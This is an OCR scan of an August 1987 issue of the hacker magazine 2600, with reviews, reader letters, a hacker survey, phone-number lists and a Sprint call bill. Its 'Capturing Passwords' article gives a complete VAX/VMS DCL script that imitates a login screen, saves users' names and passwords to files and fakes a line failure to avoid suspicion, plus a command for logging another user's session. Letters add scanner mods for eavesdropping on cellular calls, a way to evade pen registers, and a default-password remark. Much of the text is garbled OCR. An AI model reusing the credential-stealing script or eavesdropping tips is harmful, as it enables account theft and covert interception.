Full Disclosure folks. They concern the Federal
Bureau of Investigation and they will prove
intriguing to many. The FBI Project Newsletter is
a quarterly newsletter that promises to keep
readers up to date on FBI abuses and activities.
The FBI and Your BBS is a must for anyone
interested in running a computer bulletin board
system.
Included in both publications is a history of the
FBI. illustrating how the original intentions of the
agency have become tarnished over the years.
Some instances of abuses include cover ups of
criminal acts by agents and informants,
violations of the Privacy Act, and surveillance
and searches of political activists.
'The best measurement," according to the
newsletter. "of the FBI's activities was done on
March 8th, 1971, when all the records were
stolen from the FBI's office in Media, PA. They
show that the FBI's active cases at that time
were broken down as follows: 40% political
surveillance and other investigation of political
activity (2 right wing cases, 10 immigrants
cases, and over 200 left wing cases); 25%
murder, rape, and interstate theft; 7% draft
resistance; 7% leaving military without
permission; and 1% organized crime (mostly
gambling)."
We don't know what happened to the other
20% and we can't really vouch for the accuracy of
these figures. But we do know that things are
going on in the FBI that have quite a lot of people
up in arms, and computer users are no exception.
The newsletter gives tips on how to find out what
the FBI is doing in your area-everything from
listening to their radio frequencies to staking out
their hangouts and doing some surveillance of
your own.

::;:::

"...."=.-..- .... 'M.

.............-...11,'.... 1'.1_

_"_0_"_..0._

..

- .... = :.! =-:

--.-- .........

.:r---
.......

..

.. .. -

=-==

=..:r.F

.........torr

-::="'-=

..m..

...
,. ......___
u.... ..

a;ir:!f:t

... ,.....,... .. __ ..........


,... ............-..

.... ,..... - ... .......


..u,_ ..".... _""""'"._t
......... u-.. .... __

-.....:.:.:.........
.. _.,,:n...

m:::::::u:

The FBI and Your BBS provides advice on


protecting your bulletin board system from FBI
snooping. By making a system private, it
becomes a crime for an FBI agent (or anyone
else) to use the system without authorization.
This is true due to our old friend, The Electronic
Communications Privacy Act. Using the ECPA in
this way is indeed ironic, but as the newsletter
says, we must "do our best to make sure the
government follows its own rules."
We like the spirit of this newsletter and we
think anyone interested in either the FBI or
computer bulletin boards will find much
worthwhile reading here. For the future, we hope
to see more references to other kinds of law
enforcement entities, such as our friends, the
Secret Service. Limiting the subject matter to
only one organization will be somewhat
restrictive and might lead some to believe that
the publishers have a vendetta against the FBI,
even though it is unquestionably the most visible
of these agencies. We also hope to see the ideas
and values presented here show up on bulletin
boards across the country. Mass awareness is
really the only way to get these facts out.
To subscribe to this newsletter, send $10 to
The FBI Project, Box 8275, Ann Arbor, MI
48107. Send $5 for a copy of The FBI and Your

88S.

2600

August, 1987

Page 9

CAPTURING PASSWORDS
Many times if you are already a user on a VAX
VMS system, it would be handy to have the
account names and passwords of other users of
the system. In order to get additional names and
passwords, I wrote the DCl (DEC Control
language) command file below which will
simulate the normal login screen on a VT100 or
comatible terminal, and will write the user's
accoiJnt name and password to a file in your
accOUnt, and will then abort as if a line glitch had
occurred.
The user who enters his name and password
should not be suspicious, since the login appears
to abort from natural causes. In the event that
he/she is, however, the CTRl B TAB command
sequence defined will force an exit from the
network or host system before control is passed
back to the user. Note that the CTRl B TAB
sequence is system-specific and should be
whatever characters are used on your system to
disconnect the terminal or process from the host
computer.
The files USER.TST and PASS.TST contain
t h e u s e r's l o g i n n a m e a n d p a s s w o r d ,
respectively.
Another handy trick is shown below. This
command creates a file in your account which
will subsequently capture all the activity

occurring at your terminal. Any keystrokes, any


commands, all the actions done at the keyboard
will be logged in the file as well as going on at the
terminal as normal.
SET HOST /lOG=filename 0
Be sure to include a legal VM S filename and be
sure to include the zero following the filename.
Once the user or whoever logs off, system
control returns to the account from which the
above command was given. At that point, the
filename specified now has the contents of the
session. It may be necessary, if you want to edit
the file with EDT or a standard text file editor, to
n the following command:
MCR REF
This will convert non-ASCII control sequences
(like terminal control characters) to spelled-out
ASCII codes (like ESC for the Escape key). The
file can then be examined at will.
Interested in more VAX goodies? Have
terminal will travel.
Page 10

August. 1987

1600

USE THESE IF YOU ARE CONNECTED


BY A LAN TO YOUR VAX

$ SET NOCONTROL_Y
$ INQUIRE/NOPUNCTUATION RETURN "2J"
$ TYPE SYS$INPUT
You may now enter Net/One c ommands

$ INQUIRE/NOPUNCTUATION GREATER ">"


$ TYPE SYS$INPUT
connecting ll) l6l69b6 success
$ INQUIRE/NO PUNCTUATION NULL -,-_......
$ WRITE SYS$OUTPUT "2J"
$ WRITE SYS$OUTPUT "lO;OH"
$ TYPE SYS$INPUT

THIS IS WHERE YOUR PARTICULAR


LOGIN MESSAGE GOES

$
$

INQUIRE Username "Username"


SET TERM/NOECHO
$ INQUIRE Password "Password"
$ OPEN/WRITE OUTFILE PASS.TST
$ WRITE OUTFILE Password
$ CLOSE OUTFILE
$ OPEN/WRITE OUTER USER.TST
$ WRITE OUTER USERNAME
$ CLOSE OUTER
$ TYPE SYS$INPUT
User authorization

failul;e

00:00:05
CTRL_BIO,71 = \00002
$ TABIO,71 = \00011
$ ! WAIT

$ CTRL_B_TAB = CTRL_B + TAB


$ WRITE SYS$OUTPUT CTRL_B_TAB
$ EXIT

PASS.TST WILL CONTAIN


THE PASSWORD OF USER

USER. TST WILL CONTAIN


THE NAME OF USER

numbers
(continuedfrom page 7)
805 m 5399 10"

B05 m 6B32 MY CORPORATION


B05 527 7213
B05 7 65 7605
B06 353 9901 CIA
80B 477 5B44 CAMP H.". SI!ITH
B09 477 6 835 CAMP H.M. SITH

BOB 477 6B39 CMP H.M. S"ITH

BOB 477 6843 CMP H.M. SI!ITH


90B 477 6946 CA"P H. M. SmH
B08 4BB 6227 CAMP H. M. SmH
815 729 0686 JOLIET COLLEGE
B16 471 1999 METRO TONE

816 B42 0090 PBX


816 B42 0091 PBX
BI6 842 II 70 LDX TONE

817 332 B4g1 FT WORTH SCHOOL

B17 625 6401 6!S

8!9 m W3

BI8 9gB 7956 IIAZI NEWSLINE


304 B82 3 242 ELGIN BASE
904 882 3248 ELGIN BASE
904 BB2 B201 ELGIN BASE
904 BB2 B202 ELGIN BASE
912 926 22Q4 ROBINS AIR rQRCE
912 926 2 726 ROBINS AIR rORCE

912 926 3231 ROBINS AIR rORCE

912 926 3232 ROBINS AIR rORCE

912 926 9725 ROBINS AIR rORCE

914 257 42Bl SUNY


914 347 5540 BOCES

914 471 4853 "ARIST COLLEGE


914 623 0402 NANUET NATIONAL BANK
916 334 5916 ARYAN NATIONS HOTLIN
91B 258 4647

You Too Can Write


for Z6OO!
Just send your articles to:
2600 Editorial Dept.
PO Box 99
Middle Island, NY 11953
Call 516-751-2600
for specific info

at&t sub maps


by Bernie S.

Finally, something free from AT&T! I've just


received two copies of the "Submarine Cable
Systems Chart of the World," a beautiful 38" x
52" s e v e n-c o l o r m a p p r o d u c e d by t h e
Intemational Cable Engineering Department of
AT&T's Long Lines Division.
I first became aware of this map last summer
when a friend showed me a key ring an AT&T
engineer had given him. It said, "Free AT&T
Submarine Cable Maps" and listed a phone
number. When I called it, the woman who
answered knew nothing about maps but
suggested another AT&T number to try. After
five more calls like this, I finally reached AT&T's
Intemational Engineering Division. The man
there denied that such maps were available, but
after a little "social engineering" (I told him I was
a university professor of telecom engineering and
needed the map as a teaching aid), he conceded
that a new version was being readied and that
he'd see to it that I got a copy. Four months later
the maps arrived in a big tube-it was worth the
wait.
The map, a mercator projection dated
December 1986, shows in surprising detail
present and proposed submarine cables color
coded as AT&T's, others, and lightguides. To the
best of my knowledge, no major transoceanic
optical fibers have been laid yet, but this map
shows them anyway. A disclaimer states,
"NOTE: Chart scale prohibits the display of all
submarine cable systems. Precise political and
geographic distinctions are not within the scope
of this representation." Still, the map shows
quite a lot and is a respectable world map in its
own right. In addition to submarine cable
systems, the map details and labels all
significant land masses, ice shelves, ocean
depths and trenches, mountain ranges, political
boundaries, and latitude and longitude.
The Submarine Cable Systems Chart of the
World will look great on any hacker's or
phreaker's wall. It obviously cost AT&T a lot of
money to produce, so they'll probably be
reluctant to give them away to just anybody. Be
sure you have a plausible story cooked up as to
why you deserve a map before demanding one.
Good luck!
2600

August,

1987

Page

11

here are
CNAICPA Questions
Dear 2600:

I don 't u ndersta nd you r l isti ng of


CNA ( Cw;tomer's Nam e a nd Address)
n umbers. For i nsta nce, my area code is
305 i n I o r i d a . A c c o r d i n g t o yo u r
l i sti ng, I have to d i a l a rea code 912
(7840440 ) to get a customer's name
a n d a d d re s s . T h i s s e e m s s t r a n g e
bec a u se .. rea code 912 i s located i n the
State of Georg ia a nd I have to pay a to l l
cha rg e i f I use t h i s a rea code.
I h a ve R a d i o S h a c k ' s Du o p h o n e
CPA-1ooo. If a l l "pen reg i sters" work
the same as t h i s one, they can be easi ly
vo ided. Tile pen reg ister wi l l not record
the n u mber of an outgo i ng ca l l if same
i s mad e on a cord less telephone. The
c a l l is li sted as an i n c o m i n g c a l l
w ithout tile telepho ne n u mber.
I f a n yone has a suspicion that spies
a r e r e g i st e r i n g h i s o u t g o i n g c a l l
n u m bers they have only to use the
cordless phone s, without worry i ng that
sa me a re be i ng record ed.
No me rlt ion was made of t h i s i n you r
a rt i c l e "A Pen Reg i ster For P hreaks" i n
your last issue, o r d i d n 't you have a ny
know l ed ge of th is?

course, you're being tapped A face to


face conversation in the middle of a
huge empty parking lot might be the
answer. But then there are satellites. . . .

ITT Switching
Dear 2600:

The letter from Bern ie S. i n the May


issue para l le l s my exper i ence with an
In 2100 switch I was responsible for
i n my oid offi ce. That off ice has been
closed down for a year, and I d id n 't copy
t h e d oc u m e ntati o n , so I ca n o n l y
descri be it i n g e nera l terms-but here
goes.
We were a software development
team located i n Bergen Cou nty, NJ. I n
add ition t o the lIs u a l comp lement of
loca l service (NJ Bel l ) l i nes, our office
had 2 sets of l i nes for i nward-WATS
service (New Jersey a nd New York),
and 2 sets of l i nes for outward-WATS
( for New Jersey and the rest of the
cou ntry-Band 5). What the In switch
p rovid ed was c<:ll l ed D I S A, "Di r e c t
nward System Access". If you ca l led i n
on certa i n n u m be rs i n a ny o f t h e sets, i t
bypassed t h e recept ion ist's boa rd and
got a dial tone, just as thou you had
Samuel Rubin
p icked up a phone on the prem ises. You
If you take a look at our CNA list.
cou ld then d i a l a n off i ce extension
d irect ly, d i a l9 for an outside ( l oca l ) l i ne,
you 'll see that many area codes have
the ir CNA bureaus located somewhe re
or-dru m ro l l , p l ease!-d i a I81 or82 to
else, often in other states. It 's one of
get an outside WATS l i ne.
those bitter ironies we hear so much
T h i s sw i t c h wa s a l so p r og r a m
about.
m a b l e-t h e a s s i g n m e n t of w h a t
n u m ber(s) to d i al for a n outside l i ne;
It 's qute true that the pen register
ass i g n " h u nt g roups" (make ca l ls to a
c a n b e lo o led in t o t h in k ing th a t a
busy n u mber " h u nt" a nother phone to
cordless all is really an incoming call.
r i n g ); spec i a l featu res of m u lti-button
We 're nd sure if all pen registers can
phones (each button was prog ram
be trickel this easily. However, keep in
mind tht when you use a cordless' m a b l e t o p e r for m a n y a v a i l a b l e
fu nction); ass i g n a pecking order of
p hone, (o u ' r e b r o adc a s t ing y o u r
numbers that could i nterrupt ca l l s on
co n versation over the radio, which can
other extensions, etc., etc. There was a
be quite dam aging. If th is works
provis ion for n umeric passwords for
co nsiste(ltly, the best method would be
t h e W A T S l i nes , b u t we n e v e r
to dial 0/1 a cordless phone and then
i m plemented it.
transfer /0 a regular phone. Unless of

Page 1 2

,,"ugust, 1987

2600

the letters
The ent i re system was basica l ly a
g iant table of what i nterna l l i ne had
what k i nd of phone and its privi leges.
The table was kept i n both RAM and
non -volat i le memory: when you were
satisfied with your cha nges, you told
the switch to save them . Prog ra m m i ng
was done th roug h a ser i a l port, which
was hooked u p to a 300-ba ud mode m .
S i nce t h i s m odem w a s on the phone
syst e m , t h i s m e a n t t h a t i t was
access ible to the outside world (ITT
Customer S upport, by i ntention, but
a lso the wor ld genera l ly) by ca l l i ng i n
o n a designated D I SA l i ne . Usua l ly,
however, ITT service people visiting the
s i t e w o u l d b r i n g a c u st o m m i n i
term i n a l or a Radio Shack M ode l 1 00
with them and hook u p di rectly to the
ser i a l port. The system was password
protected, but the defa u l t "master"
password i s pretty obvious.
The orig i n a l idea was that us
prog rammer types cou ld h ave
term i n a l s at home, and if we g ot ca l led
to ta ke care of a c l ient's blowup, we
wou ld ca l l in to work (on a loca l n u m be r
if w e l ived c lose enough, or on the i n
WATS if f u rther o u t ) a nd d i a l u p t h e
c l ient mach i ne o n t h e out-WATS . I n
practice, it never worked worth a damn
beca use the end-to-end l i ne l osses
i nvolved i n going from WATS to WATS
prevented o u r cheap modems from
ha ndshaking .
The powers that be lost i nterest i n
t h e system w h e n it became apparent
that (A) it wou ldn't provide the work
f r o m - h o m e c a p a b i l i ty t h ey w e r e
prom ised, a nd (B) the bozo employees
cou ldn 't keep stra ight when to use i n
WATS a nd w h e n t o ca l l i n on their own
nicke l . ( Least-cost routing was a pretty
far-out concept for most of them . Of
cou rse, if some of them were u s i ng the
system to ca l l Mom i n Pa lm Spri ngs, it
wou ldn 't have shown on the WATS b i l l ,
wh ich g ave only tota l hou rs o f u s e . I s ,

that why WATS l i nes a re cheape r than '


reg u la r ones?)
Oh, by the way-I tried the Caro l i n a
Beachcomber' s VAX program u n d e r a n
account that has C M K R N L b u t NOT
CM EXEC; it works u nder that situation,
too. G ives a fel l a a warm fuzzy feel i ng
j ust to know that it's there if he rea l ly
needs it. . . .
The Primal Wombat

Hotline Numbers
Dear 2600:
My m a i lbox is a lways fu l l of ma i l
promot i ng some k i nd of I nvestment
Advi so ry Service. These services te l l
you a l l about the economy, where it's
h eaded, and what to i nvest i n to m a ke
big bucks. For a fee ( r a ng i ng from $ 1 9
to $ 1 49) these services m a i l out a
monthly newsl etter recomm e nd i ng the
hottest stocks, bonds, fu nds, opt ions,
all ki nds of t h i ngs.
M ost of t hese services a Iso provide a
telephone h ot l i ne to ca l l for da i ly or
weekly advice, wh i l e wa iting for the
newsletter .
If any o f you r readers know o f a ny of
t h e se p h o n e n u m be r s , h ow a b o u t
p u b l i s h i ng t h e l ist? Who knows, we
m ig h t a l l get r i c h ( lega l ly) wh i l e we
read 26oo!
Frank B ,

Monitoring Cellular
Dear 2600:
U pdating the i nformation conta i ned
in the "Tel ecom I nformer" of you r Apr i l
issue:
The 800 mhz mod diode was moved
from the u nderside of contro l l e r board
PC-3 in later mode ls of the Radio S hack
Pro-2004 sca n ner. S n ipping one end of
t h e d i od e i s s t i l l t h e m o d i f i c a t i o n ,
however . O n e a lmost gets the fee l i ng
that Radio S hack wa nted to m a ke it
e a s i e r for us t o m o n i t o r c e l l u l a r
telephones.
(continued on page 18)
2600

August.

1987

Page 13

l'he Summer Games of 1 987


you 're saying so there 's no

longer works. Passwords will also not be


accessible by anyone other than the
news- they 're mostly Iljter ratings.
caller.
Naturally, you should try not to let
We feel this will uncloud the issue of
yourself get into a ,ituation where such
what is legal and what is not. On the
public levels, illegal information, such as
unpleasant things can happen to you.
credit card numbers and long distance
But sometimes thai isn 't enough. In
1 985, The Private Sector, a bulletin
codes, won 't be permitted and will be
board run by 2600, was seized merely
removed if spotted. Public levels will be
because its phone number had been
accessible to everyone who calls. Private
mentioned on another bulletin board
mail will remain private. It will be
system that was being investigated.
analogous to the mail we get from the
Clearly, these are prectU"ious times.
post office. By making these distinctions,
we think it will become much harder for
On the subject of bUlletin boards,
bulletin boards to be "raided" because of
we 've made some UflpOrtant decisions in supposedly illegal activities.
the last month. We are going to try and
We 've received some calls from folks
interested in running bulletin boards.
start up some boarJs as quickly as
possible. Each of oPT hoards will have
We now need software that can perform
public levels that ate open to anyone
the above functions. If you have access
who calls in. Verification of callers will
to this, please contact us.
. not be required. Being anonymous is
If you belong to a company or
your right. Each caller will also be given organization that agrees with what we 're
a private mailbox, through which he can saying, you might want to donate or
loan computer equipment for this
communicate with {)ther individual
callers. What goes on ill the private
purpose. We'll also be happy to run
boards for anyone who wants to sponsor
mailboxes will only be seen by the
sender and the receiver. The system
one, but has misgivings about doing it
operator won 't even be able to access
from their home. We have the means to
this information, at least not without
save a little bit offreedom here. We
resetting the accoUltt so the password no cannot do this alone.

;;:;- mis

understanding. A void local TV

]
s

..::::

- - - - - - - .". ...... _ - - .- - - - - - - - - - - - - - - - - - -

2600 HA S MEETINGS
Every Friday afternoon
between the hours of 5 and 8
in the Ma rket area of the Citicorp Center
in New York City
53rd Street and 3 rd Avenue
,

Page 14

August, 1981

2600

A HA CKER SUR VEY


At times like these, people begin asking
philosophical questions. What is right and
what isn 't? We thought that would be a
good subject to ponderfor the hackers of
the world and this is what we 've managed
to come up with sofar. Feelfree to write in
with your own comments, whether you re
a hacker or not.
The one thing that most of the hackers
we spoke with seem to agree upon is that
stea ling merchandise with credit card
numbers is wrong. Many went on to say
that this does not comprise hacking a1 all.
In other words, any moron can get a credit
card number and many do.
Why are such people categorized as
computer hackers? Probably because
some of them use computers to get credit
card numbers, said a few. Others believe
it s because the public and the media don 't
understand how anything involving credit
card fraud can be accomplished without
the help of a computer. It s quite possible
to commit credit card fraud simply by
picking a credit slip out of the garbage or
by standing around an A TM machine
until somebody discards a receipt that has
their Visa number on it. Since many credit
checks don 't verify the person s name or
the card s expiration date, it s become
extraordinarily easy. Which is another
reason many hackers dislike it.
What should happen to such people?
Many hackers believed they should be
dealt with severely, although prison terms
weren 't mentioned. A lmost all believe
they shouldpay back whatever it was they
stole.
Ho w a b o u t long dis tance fraud?
Reactions to this were mixed. Some feel
that ripping offlong distance companies is
exactly like credit card fraud. Others
b e l i e v e i t 's a fe w s t ep s a b o v e i t ,
particularly ifa hacker uses ingenuity and
common sense to avoid being caught. A
few questioned whether or not there was
actually any loss ofmoney to the company
involved, particularly the big ones. " Who
does A T& T have to pay when they re

stuck with a fraudulent phone bill? Do


t h ey p ay t h e m s e l v e s ? Th e s m a l l e r

companies usually pay A T& T, b u t who


do the bigger companies have to pay? It s

not like we 'd make a two-hour call across


the country if we had to pay for it, so the
lost revenue speech is kind of hard 10
swallow . .. "It seems to me that the phone
lines would still be there whether or not we
were on them, the computers would still
be running if we wer.en 't on them, either
way the cost to the company is almost the
same. " A few pointed out that the bad
p u b l i c i ty s u r r o u n ding c o de a b u s e
probably does more harm than the actual
phone bills.
Som e said that t o ll fraud was a
necessary part ofcomputer hacking, but it
wasn 't a form of hacking in itself. But
nearly all we questioned seemed to agree
that when caught, the culprit should be
made to pay back what they used, as long
as they 're presented with evidence that
they made the calls.
What kind of hacking is acceptable in
the hacker world? Generally, access to
systems that a hacker would never gain
access to, regardless of how much he was
willing to pay. Systems like the phone
company comp u ters, c redit checks,
census b u reaus, and p rivate m ilitary
sys tems were men t ioned m o s t . "By
accessing these, we re learning a lot more
than we ever could on Compuserve.
We
can uncover lots ofsecrets, like how easy it
is to change somebody s credit or how
easy it is to find an un lis ted phone
number. People would never know these
things if it weren 't for us . .. These kind of
'w

h a c k e rs l o o k up o n t h e m s e l v e s a s
"technological Louis and Clarks ':
What kind ofprice should a hacker pay
if he s caught on a non-public system ? A
few said a fine of some sort should be
imposed. But most seemed to believe that
an agreement of some s o r t could be
reached between the variousparties, such
as the hacker telling the operators how
they accessed their system and what bugs
(continued on page 22)
2600

August, 1987

Page 1 5

.'

.. !,!.!,..
Jelent, ("lImn1UniClllillns Cllrporation
12491} Sunnse Villi"

Drive

/lesIOn. ;1 2Z096

70) 478 J04I/


7/0 1 /87
Dear PC Pursuit Customer:

You may be aware of the FCC's recent proposal to impose swi tched access charges on
Telenet and the other enhanced service providers (ESPs). This le tter is being sent to all
PC Pursuit users to provide some initial informa tion on the new F C C proposal and to
answer questions you may have regarding the proposal and its potential i mpact on PC
Pursuit and other computer-based services.
Switched access charges (also called "carrier access charges") were origina lly devised by

the FCC as the interexchange carriers' means of payment for their use of the local
exchange dial network in originating and terminating long distance traffic . Now the F C C
proposes t o extend these access charges t o enhanced services such a s Telene t ' s P C
Pursuit . a s well a s t o any other computer-based servic e which h a s interstate traffi c ,
including database services. electronic m a i l , computer conferencing, home
banking/shopping, timesharing, and videotex.

Based on information now available from the F C C , we estimate that access charges would
add approximately $4.50 per hour to ES P costs for dial-in access to a remote host
computer, and $7-9 per hour for a service such as P C Pursuit which uses both dial-in and
dial-out access on each call. PC Pursuit customers and other computer users would be
particularly affected by these access charges. P C Pursui t ' s curren t "Flat-rate/un l i m i ted
usage" service would have to be repriced on a per usage basis, incorpora ting the. $7-9 per
hour access charge. It is doubtful that the service could survive a t this inflated rate.
Telenet and the other enhanced service providers intend to fight the F C C ' s proposal . You
can assist in our effort by letting the FCC and your Congressional representatives know
how access charges will adversely affect your ability to reach i nform a tion and remote
BaS systems affordably. The FCC has asked for this input. Please use this opportunity to
add your voice to the debate and stop the proposed increase.
Once the F C C ' s official Notice of Proposed Rulemaking has been published, w e will
provide more details on the proposal. This information will include addresses and other
information for your letters. and the F C C ' s schedule for receiving com ments on the
proposal. In the meant i m e . please address your questions or c o m m ents to F C C . ISSUES on
PC Pursuit's Net Exchange BaS. P C Pursuit customers can access the Net Exchange using
the following sign-on procedures:

@C PURSUIT, YOURID (CR)


PASSWO RD.YOURPASSWORD (CR)
Working together, we defea ted a s i m ilar proposal which would have appl ied access charges
to PC Pursuit and other enhanced services just three months ago. With the sa m e effort
now w e can repeat our victory, and protect the important computing resources we enjoy
affordably today.

WE N EVER THOUGHT WE'D SEE THE DAY WHEN THIS MAGAZINE would
adually donate space to a huge corporation in order to give them a chance to get a
message through. Well, in this particular case, they make a lot of sense. It's a rare
oaurrenu, but it does happen now and then.
Pa J 6

AUp!lI. 1 987

lMJO

l 'S Sprillt ( 'Oll/ lTl ll l l ica/iolls ( 'Oll/paIlY

;
z
f't>
0
po f't> I"> :;
.

:
:;
f't>
=
_

f't>I">

..
g
;
"
g.
_
0-

=a
;Q.
:$;

==-

CA L L D E TA I L - - - - P A G E
P I N/ A CC O U N T I N G C O D E 3 6 7
O R I G . C I T Y : O A K L AN D

-l
:t
\Il

::
o

NO

1 0 6 / 0 3/ 8 7 0 6 : 3 1 PM
2 0 6 / 0 3/ 8 7 0 6 : 3 3 P M
3 0 6 / 0 3/ 8 7 0 7 : 5 4 P M
4 0 6 / 0 3/ 8 7 0 9 : 2 0 P M
5 0 6 / 0 3/ 8 7 1 1 : 4 1 P M
6 0 6 / 0 3/ 8 7 1 1 : 5 1 PM
7 0 6 / 0 4/ 8 7 1 2 : 2 8 AM
8 0 6 / 0 4/ 8 7 1 2 : 4 3 AM
9 0 6 / 0 4/ 8 7 1 1 : 53AM
1 0 0 6 / 0 4/ 8 7 0 2 : 0 7 PM
1 1 0 6 / 0 4/ 8 7 ' 0 2 : 2 1 P M
1 2 0 6 / 0 4/ 8 7 0 2 : 3 4 PM
1 3 0 6 / 0 4/ 8 7 0 5 : 0 8 PM
1 4 0 6 / 0 4/ 8 7 0 6 : 1 2 PM
1 5 0 6 / 0 4/ 8 7 0 7 : 4 6 P M
1 6 0 6 / 0 4/ 8 7 0 8 : 0 1 PM
11 6 / 5 / 81 1 2 : 1 1 ?"
1 8 0 6 / 0 5/ 8 7 0 2 : 0 0 P M
1 9 0 6 / 0 5/ 8 7 0 4 : 2 4 P M

3
o....
L:
"'

r
[JJ
:--- c0
! '" o

O
o s. - :=i

=- - .
f't>:$;_ Q. 0o 1JQ 3 'O
S.
- 0
= f't>
::::$;
0
=: 5;"
:$; 3
_
:!.

0 =f't>
f't>= _
;
_
f't> f't>:$; fJ')
:$;---- = ......
0= "' =
=
..... IJQ Q.
\Il
=-

>

0:
f!I.

"=
.,
IIQ
..
-.I

1ij' ''5;

I">

2 0 0 6 / 0 5/ 8 7 0 6

= 0 ::
Q. -

21
22
23
24
25

!!: !2:

O :; :l!l
0= =!'t>
IJQ
....

:$; :::

f't> =.., r") ...


.. 0 '"
! Q.
f't> 03
- - ::
=- =- f't> f't> = .-

TIME

DAT E

0 6 / 0 5/ 8 7
0 6 / 0 5/ 8 7
0 6 / 0 5/ 8 7
06/ 06/87
06/06/87

06
09
11
11
11

E
E
E
E
N
N
N
N
D
D
D
D
E
E
E
E
D
D
D
: 1 3 PM E
: 1 6 PM E
: 1 8 PM E
: 1 0 PM N
: 24AM N
: 25AM N

32

CUSTOMER :
I NV O I C E I
J U L 0 5 , 1 987

C I TY
L O SANGE L ES
A L AMEDA
A L AMEDA
A L AMEDA
B E R K E L EY
B E R K E L EY
DAV I S
DAV I S
DAV I S
SANBARBARA
l I E B S T E R
L A MESA
I R V I tl E
SARASOTA
R I C H l O N D
SARASOTA
'il'C'iW.. 'C'L 'C'1
I RV I N E
OAKLAND

H EM L OCK

ST

A/C

NUMBER

CA
CA
CA
CA
CA
CA
CA
CA
CA
CA
NY
CA
CA
Fl
CA
Fl
C J\
CA
CA

213
415
415
415
415
415
916
916
916
805
7 16
619
714
813
415
813
41 5
714
415

38 9 - 2 5 1 4
523-5083
523-5083
5 2 3 -7 1 54
8 4 5-7 4 4 3
8 4 5-7 4 4 3
7 52-489 4
7 52-48 21
7 56 -6 3 37
6 8 5 -8 2 1 0
6 7 1 - 07 7 1
6 98-8925
8 56 - 0 3 1 9
9 24-7 3 1 7
2 2 3 -6 6 2 5
9 24-7 317
6 42 - 4 6 6
8 56 - 0 3 1 9
8 36 -8 7 3 3

3
2
1
1
1
2
15
1
8
16
10
10
1
2
6
65
l
11
1

MI
CA
CA
CA
C A_

517
714
916
415
415

6 4 2 -8 1 0 1
5 9 5 - 9 4 36
7 52-37 1 9
521-0506
521-161 1

12 .
1 .
31 .
1 .
1 .

MI 5 1 7 6 4 2-8 1 0 1

H EM L O C K
D I AMONDBAR
DAV I S
A L AMEDA
A L AMEDA

US Sprin L,

MI N
. 0
. 0
. 0
. 0
. 0
. 0
. 0
. 0
. 0
. 0
. 0
. 0
. 0
. 0
. 0
. 0
o ti
. 0
. 0

1.0
0
0
0
0
0

COST
.79
. 26
. 17
. 17
. 12
. 19
1 . 86
. 19
1 .73
4 . 46
3 . 23
2 . 95
. 34
. 43
.61
1 2 . 87
. 22
3 . 23
. 22

. 23

2 .
.
3 .
.
.

41
34
76
12
12

tellers

(continuedfrom page 13)

To restore 800 mhz coverage on the


Pro-2004 sca n ner, ca refu l ly remove
the cover a nd locate t h e contro l l e r
boa rd PC-3. Ea r ly versions wi l l have a
d i ode added to the u nderside of t h i s
mod u l e . O n t h e newer m ode l s t h e
d iode h a s been relocated to the t o p of
PC -3. Locate D i ode 0 5 1 3 towa rd the
back l eft of the mod u l e a nd clip one
end. (You can remove it e n t i re ly, but it's
easier to put back together for serv i c i n g
u nder the wa rra nty if y o u s i m p l y s n i p
one e nd . ) Th is w i l l restore both the 30
khz steps a n d the 800 m h z ce l l u l a r
telephone ba nd.
Keep u p the good work!
Stingray
The federal go vernment has recently
s ide d w i t h t h e c e llu la r p h o n e
companies in aI/owing them to not
p la c e w a r n in g s on th e ir p h o n e s
admitting to the possibility o f their
p h o n e c a lls b e ing lis ten e d to. O u r
position is simple: listening t o a radio is
not the same as tapping into a line. For
one thing, it 's a hell of a lot easier. But
there is really no in vasion o f privacy in
receiving something that has come
into your own home. Eventually, we
feel, the crazy la w that makes it a crime
to listen to certain freqlfencies will be
rep e a le d. Esp e c ia lly if p la n s a n d
modifications like the abo ve continue
to proliferate. Send us yours toda y!

A n Experience
Dear 2600:

About a yea r a nd a h a l f ago I was


apprehended for " u nautho r i zed u se of
phone l i nes" . Here's my expe r ience i n
a n utsh e l l . M yse lf a n d rny friend, T h e
Ice Lord, r a ng u p most, of a bo u t $8000
worth of fra u d u lent ca l l s to a sma l l long
d i stance service that cou l d n 't afford to
take t h e loss. Through c a r e lessness,
w e we r e b u s t e d b y th e j e r kw a t e r
s h e r i ff ' s depa rtment in cooperation
with som e i ncom petent P I ' s a n d the
F B I . T h e y f u m b l e d a rou nd with my
sys t e m a n d g ave awa the fact that
Page

18

A ugust.

1 987

21110

they had j u st busted Ice Lord by the


way t h ey a c c e s s e d d i s k d i recto r i e s
befo r e p a c k a g i n g u p m y c o m p u t e r ,
notes, a n d joyst icks. I wou ld advise that
a nyone who gets i nto a s i m i l a r
situation not ta lk, as I d i d , beca use i n
m y case cooperation didn 't make i t a ny
eas i e r on m e . It j u st strengthened the
p l a i n t i ff ' s case a n ywa y . The j u d g e
w e n t p retty e a s y o n u s a n d t h e
i n s u r a n c e company sett led the
l aws u it, so a s soon a s I get a new
keyboa rd (the cops ma naged to waste
most of my Com m -64's c h ips), l ife w i l l
get mostly back to norma l . By the way,
eve n though they had evidence , other
cri mes were over l ooked . J u st wanted
to s h a re my expe r i e n ce-hope it's of
some va l u e .
I love you r mag b u t can I anticipate
somet h i ng more in the way of how-to
a r t i c l e s a n d b e g i n n i n g to s e m i
tec h n ica l p rojects? Also, I 'm looki ng
forwa rd to hea r i ng a bout a 2600 meet
on the west coast. Any cha nce of it?
Last ly, can you g ive m e the fu l l story
on B i l l La ndreth 's d i sappea rance?
The Sorcerer
We hope when you sa y "life will get

back to normar, you don 't mean you 'll


continue to openly commit fraud on
some poor phone company. There is
very little of what you told us that
sounds like true phreaking or hacking.
A n ybody can make free phone calls
these days but only a few know how to
thoroughly explore and discover new
tricks.
We 're lo o k ing for m o r e h o w - t o
a r t i c le s w h i c h o u r r e a de r s a r e
e n c o uraged t o s ubm it. A s fa r a s
m e e ting on t h e w e s t c o a s t. tha t
depends o n how many people seem
interested.
We don ' t k n o w m u ch ab o u t B ill
Landreth (author of Out of the Inner
Circ le), b u t word h a s it t h a t h e 's
reappeared.

(continued on page 22)

2600 marketplace
A F U LL PAG E AD in 2600 costs o n l y $ 200.
Half page, $ 1 00. Contact 2600 Advert i s i n g ,

D OC U M E NTAT I O N o n e l ectron i c & d ig ita l

PO B o x 762, M iddle I s l a n d , NY 1 1 9 5 3 .

PBX's a n d switch i ng system s . Wi l l i ng to

F O R S A L E : SWT P C M o d e l C T - 8 2

t r a d e / p u r c h a s e . A l so l o ok i n g f o r B e l l

i n te l l i g e n t video term i n a I . Com p l et e l y

System Practices a n d other such

